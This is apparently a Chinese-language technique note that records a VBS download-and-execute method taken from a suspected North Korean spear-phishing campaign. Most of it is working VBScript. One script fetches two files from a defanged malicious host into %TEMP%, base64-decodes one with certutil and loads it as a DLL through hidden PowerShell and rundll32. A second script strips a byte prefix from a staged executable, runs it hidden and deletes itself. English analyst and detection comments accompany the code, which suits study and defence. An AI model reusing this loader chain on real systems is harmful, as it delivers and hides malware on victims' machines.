利用VBS下载EXE文件手法记录

1、信息来源

疑似朝鲜通过鱼叉攻击韩国统一部记者的APT事件整理

https://mp.weixin.qq.com/s/4IFV31MBNbANnCVaJj7ZPQ

https://twitter.com/blackorbird/status/1082553543280680962

2、利用思路

1、 下载 http://恶意网址/note[.]png 并保存到 %temp% 路径下，通过【powershell Invoke-item】运行。
2、 下载 http://恶意网址/svchow.dat 并保存为 svchow[.]dat
3、 certutil -f -decode 强制覆盖文件、base64 解码后改名为 dll
4、 通过 powershell 运行 rundll32 加载 svchow.dll 中的 MyRTLCreateFunction 函数运行恶意代码。

3、实例代码

下载代码:

' Analyst annotation: two-stage VBS downloader. Both stages use Microsoft.XMLHTTP to
' fetch a URL and ADODB.Stream to write the raw response body under %TEMP%; every
' follow-on step is launched through Wscript.Shell.Run with window style 0 (hidden)
' and bWaitOnReturn = true, so the script blocks until each child exits.
Set wshShell = CreateObject("Wscript.shell")
dir = wshShell.ExpandEnvironmentStrings("%TEMP%") ' drop directory for every artifact below
docUrl = "http://恶意网址/note.png" ' stage 1 URL (defanged on this page)
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", docUrl, False ' synchronous GET (async = False): script waits for the full response
xHttp.Send
docPath = dir + "\note.png" ' on-disk artifact: %TEMP%\note.png
with bStrm
	.type = 1 '//binary
	.open
	.write xHttp.responseBody
	.savetofile docPath, 2 '//overwrite
end With

' Stage 1: Invoke-Item opens %TEMP%\note.png with its default handler from a hidden
' PowerShell window. The ".png" name only reflects how the file was served; what it
' actually contains cannot be determined from this listing.
CreateObject("Wscript.shell").Run "powershell Invoke-item '" + dir + "\note.png'", 0, true

' Stage 2: same XMLHTTP + ADODB.Stream pattern, second artifact %TEMP%\svchow.dat.
docUrl = "http://恶意网址/svchow.dat"
dim xHttp2: Set xHttp2 = createobject("Microsoft.XMLHTTP")
dim bStrm2: Set bStrm2 = createobject("Adodb.Stream")
xHttp2.Open "GET", docUrl, False
xHttp2.Send

with bStrm2
	.type = 1 '//binary
	.open
	.write xHttp2.responseBody
	.savetofile dir + "\svchow.dat", 2 '//overwrite
end With
' certutil -f -decode: base64-decodes %TEMP%\svchow.dat into %TEMP%\svchow.dll, -f forcing
' overwrite (section 2, step 3). Detection note: certutil -decode followed by rundll32, both
' spawned through a hidden powershell from a script host, is the process-tree chain to look for;
' the exact parent (wscript.exe vs cscript.exe) depends on how the .vbs was launched.
CreateObject("Wscript.shell").Run "powershell -windowstyle hidden certutil -f -decode " & dir & "\svchow.dat, " & dir & "\svchow.dll",0,true
' rundll32 loads the decoded DLL and calls its export MyRTLCreateFunction — the final payload per section 2, step 4.
CreateObject("Wscript.shell").Run "powershell -windowstyle hidden cmd /c rundll32 " & dir & "\svchow.dll,MyRTLCreateFunction",0,true


转码运行exe:

' Analyst annotation: reads a staged file, and if it starts with the two bytes 0xFF 0xFE,
' strips that 2-byte prefix, rewrites the file in place, runs it hidden, then deletes
' the running script itself.
Dim fIn, fOut, sFilename, sBOM
sFilename = "C:\windows\temp\xxx.exe" ' hard-coded path of the staged file ("xxx" is a placeholder on this page)

Set fIn = CreateObject("adodb.stream")
fIn.Type = 1 'adTypeBinary
' NOTE(review): adModeRead is an ADO enum name; plain VBScript does not define it unless
' the ADO constants are provided elsewhere, so as written this is an undeclared name —
' confirm how the host resolves it before relying on the Mode value.
fIn.Mode = adModeRead
fIn.Open
fIn.LoadFromFile sFilename

sBOM = fIn.Read(5) ' reads the first 5 bytes; only bytes 1 and 2 are tested below
' UTF8 BOM is 0xEF,0xBB,0xBF (decimal 239, 187, 191)
' NOTE(review): the condition below compares against 255,254 (0xFF 0xFE, the UTF-16 LE
' byte-order mark), not the UTF-8 bytes named in the comment above; the comment is
' stale relative to the check that actually runs.
If AscB(MidB(sBOM, 1, 1)) = 255 _
        And AscB(MidB(sBOM, 2, 1)) = 254 Then
    
    fIn.Position = 2 ' Skip BOM

    Set fOut = CreateObject("adodb.stream")
    fOut.Type = 1 'adTypeBinary
    fOut.Mode = adModeReadWrite ' same undeclared-name caveat as adModeRead above
    fOut.Open

    fIn.CopyTo fOut ' copies everything from byte offset 2 onward, i.e. the file minus its 2-byte prefix

    fOut.SaveToFile sFilename, 2 'adSaveCreateOverwrite
    fOut.Flush
    fOut.Close

	' Executes the rewritten file with window style 0 (hidden); bWaitOnReturn = False, so
	' the script continues immediately.
	Set shell = CreateObject("Wscript.Shell")
	shell.Run "c:\windows\temp\xxx.exe",0,False
	
	' Self-deletion. WScript.ScriptName is the bare file name (no directory), so the delete
	' resolves against the process's current directory; forensics note: if that differs from
	' the script's own directory the .vbs may still be present on disk.
	Set fso = CreateObject("Scripting.FileSystemObject") 
	fso.DeleteFile(WScript.ScriptName) 
End If